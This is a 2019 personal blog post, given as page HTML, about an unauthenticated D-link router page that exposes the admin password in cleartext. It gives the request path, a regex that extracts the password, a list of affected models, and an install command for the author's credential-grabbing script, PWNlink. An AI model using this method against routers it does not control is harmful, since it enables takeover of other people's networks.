215 lines
9.0 KiB
HTML
215 lines
9.0 KiB
HTML
<head>
|
||
<title>Evan Pratten</title>
|
||
<meta charset="utf-8" />
|
||
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
|
||
|
||
<!-- Begin Jekyll SEO tag v2.6.1 -->
|
||
<title>I had some fun with a router | Evan Pratten</title>
|
||
<meta name="generator" content="Jekyll v4.0.0" />
|
||
<meta property="og:title" content="I had some fun with a router" />
|
||
<meta property="og:locale" content="en_US" />
|
||
<meta name="description" content="cleartext passwords + external management = death wish" />
|
||
<meta property="og:description" content="cleartext passwords + external management = death wish" />
|
||
<link rel="canonical" href="http://0.0.0.0:4000/blog/2019/06/27/pwnlink" />
|
||
<meta property="og:url" content="http://0.0.0.0:4000/blog/2019/06/27/pwnlink" />
|
||
<meta property="og:site_name" content="Evan Pratten" />
|
||
<meta property="og:type" content="article" />
|
||
<meta property="article:published_time" content="2019-06-27T13:16:00-04:00" />
|
||
<script type="application/ld+json">
|
||
{"datePublished":"2019-06-27T13:16:00-04:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/blog/2019/06/27/pwnlink"},"@type":"BlogPosting","url":"http://0.0.0.0:4000/blog/2019/06/27/pwnlink","headline":"I had some fun with a router","description":"cleartext passwords + external management = death wish","dateModified":"2019-06-27T13:16:00-04:00","@context":"https://schema.org"}</script>
|
||
<!-- End Jekyll SEO tag -->
|
||
|
||
|
||
|
||
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
|
||
integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
|
||
<link rel="stylesheet" href="/assets/css/main.css">
|
||
<link rel="stylesheet" href="/assets/css/github-syntax.css">
|
||
<link href="https://fonts.googleapis.com/css?family=IBM+Plex+Mono:400,400i|IBM+Plex+Sans:100,100i,400,400i,700,700i" rel="stylesheet">
|
||
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
|
||
</head>
|
||
|
||
<body>
|
||
|
||
<div class="site-ctr">
|
||
<!-- Navbar -->
|
||
<nav class="navbar navbar-dark sticky-top bg-dark navbar-expand-lg">
|
||
<!-- Navbar content -->
|
||
<!-- <div class="container"> -->
|
||
<a class="navbar-brand" href="/">Evan Pratten</a>
|
||
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup"
|
||
aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
|
||
<span class="navbar-toggler-icon"></span>
|
||
</button>
|
||
<div class="collapse navbar-collapse" id="navbarNavAltMarkup">
|
||
<div class="navbar-nav ml-auto">
|
||
<a class="nav-item nav-link" href="/blog">Blog</a>
|
||
<a class="nav-item nav-link" href="/projects">Projects</a>
|
||
<!-- <a class="nav-item nav-link" href="/documentation">Documentation</a> -->
|
||
<a class="nav-item nav-link" href="/about">About</a>
|
||
</div>
|
||
<!-- </div> -->
|
||
</div>
|
||
</nav>
|
||
<!-- <div style="height:5vh"></div> -->
|
||
|
||
<!-- Header -->
|
||
<!-- <div class="header">
|
||
<div class="container">
|
||
<div class="content">
|
||
</div>
|
||
</div>
|
||
<div class="header-gap"></div>
|
||
</div> -->
|
||
|
||
<div class="reactive-bg">
|
||
<div class="post container">
|
||
<h1>I had some fun with a router
|
||
|
||
</h1>
|
||
<h4>cleartext passwords + external management = death wish
|
||
|
||
</h4>
|
||
<hr>
|
||
<p><em>2019-06-27 13:16:00 -0400
|
||
|
||
</em></p>
|
||
|
||
<br>
|
||
|
||
<p>I was playing around with some D-link routers today and remembered an <a href="https://www.exploit-db.com/exploits/33520">ExploitDB Entry</a> I read a while ago. Many D-link routers have a great feature that allows remote management and configuration queries. Interestingly, this cannot be disabled, and one of the pages contains a cleartext version of the admin password (yay!).</p>
|
||
|
||
<h2 id="how-to-get-yourself-an-admin-password">How to get yourself an admin password</h2>
|
||
<p>On any supported router, make an HTTP request to <code class="highlighter-rouge">http://your.router.ip.addr/tools_admin.asp/</code>. This will return a pretty large XML file containing information about your router’s hardware and configuration.</p>
|
||
|
||
<p>Notice the fact that you did not have to log in. This is due to the fact that this file seems to be used by a remote management service of some sort.</p>
|
||
|
||
<p>The important thing to note here is that, when parsed with the regex pattern: <code class="highlighter-rouge">name="user_password_tmp" value="(.*)"></code>, you get a single string. This string is the admin password of the device.</p>
|
||
|
||
<h2 id="supported-routers">Supported routers</h2>
|
||
<p>This is supported by many D-link routers. The ones I know about are:</p>
|
||
<ul>
|
||
<li>DIR-835</li>
|
||
<li>DIR-855L</li>
|
||
<li>DGL-5500</li>
|
||
</ul>
|
||
|
||
<p>Some routers have this XML file, but it is restricted… By a user without a password. These are:</p>
|
||
<ul>
|
||
<li>DHP-1565</li>
|
||
<li>DIR-652</li>
|
||
</ul>
|
||
|
||
<h2 id="pwnlink">PWNlink</h2>
|
||
<p>Like everything I play with, I made a script to do this all for me (and spent a large amount of time adding colours to the text).</p>
|
||
|
||
<p>My script is called PWNlink (PWN + D-link), It automatically finds a router on your network by looking for a specific DNS entry created by many D-link routers, then checking your gateway. Next, PWNlink reads you router’s <code class="highlighter-rouge">hnap1</code> config to find it’s model number. If supported, the script will read and parse the appropriate configs to give you the admin credentials for your router.</p>
|
||
|
||
<p>PWNlink can be installed on any *nix computer that has both <code class="highlighter-rouge">python3.7</code> and <code class="highlighter-rouge">python3-pip</code> installed. To install PWNlink, run:</p>
|
||
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip3 install pwnlink
|
||
</code></pre></div></div>
|
||
|
||
<p>Run the script without any arguments for automatic detection, or pass any IP address to use manual detection.</p>
|
||
|
||
<h2 id="disclamier-thingy">Disclamier thingy</h2>
|
||
<p>I don’t see much point to these, but I should probably put one anyways.</p>
|
||
|
||
<p><strong>Don’t be dumb with this script.</strong></p>
|
||
|
||
<p>I have only used it on my own (or 5024’s) routers, and did not create PWNlink with any malicious intent.</p>
|
||
|
||
</div>
|
||
</div>
|
||
|
||
</div>
|
||
<!-- <div id="particles-js"></div> -->
|
||
|
||
<div class="container foot" style="text-align:center;">
|
||
<br>
|
||
<span class="site-info">
|
||
Site design by: <a href="https://retrylife.ca">Evan Pratten</a> |
|
||
|
||
This site was last updated at: 2019-11-30 11:37:59 -0500
|
||
</span>
|
||
</div>
|
||
|
||
<!-- Brython -->
|
||
<script src="/assets/js/brython.js"></script>
|
||
<script src="/assets/js/brython_stdlib.js"></script>
|
||
|
||
<script>
|
||
function startPY(){
|
||
|
||
brython();
|
||
console.log("Started Python")
|
||
}
|
||
|
||
window.onload = startPY;
|
||
</script>
|
||
|
||
|
||
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
|
||
integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
|
||
crossorigin="anonymous"></script>
|
||
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"
|
||
integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
|
||
crossorigin="anonymous"></script>
|
||
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"
|
||
integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
|
||
crossorigin="anonymous"></script>
|
||
|
||
<!-- Offsets for links -->
|
||
<script>
|
||
(function ($, window) {
|
||
var adjustAnchor = function () {
|
||
|
||
var $anchor = $(':target'),
|
||
fixedElementHeight = 100;
|
||
|
||
if ($anchor.length > 0) {
|
||
|
||
window.scrollTo(0, $anchor.offset().top - fixedElementHeight);
|
||
}
|
||
|
||
};
|
||
|
||
$(window).on('hashchange load', function () {
|
||
adjustAnchor();
|
||
});
|
||
|
||
})(jQuery, window);
|
||
</script>
|
||
|
||
<!-- Global site tag (gtag.js) - Google Analytics -->
|
||
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-74118570-2"></script>
|
||
<script>
|
||
window.dataLayer = window.dataLayer || [];
|
||
function gtag() { dataLayer.push(arguments); }
|
||
gtag('js', new Date());
|
||
|
||
gtag('config', 'UA-74118570-2');
|
||
</script>
|
||
|
||
|
||
<!-- particles -->
|
||
<script>
|
||
var body = document.body
|
||
|
||
var particles = document.getElementById("particles-js")
|
||
|
||
particles.style.height = body.scrollHeight + "px"
|
||
|
||
console.log(body.scrollHeight)
|
||
</script>
|
||
<script src="/assets/js/particles.min.js"></script>
|
||
<script>
|
||
particlesJS.load('particles-js', '/assets/js/particles.json', function () {
|
||
console.log('callback - particles.js config loaded');
|
||
});
|
||
</script>
|
||
|
||
<!-- Twitter embeds -->
|
||
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
|
||
|
||
|
||
</body> |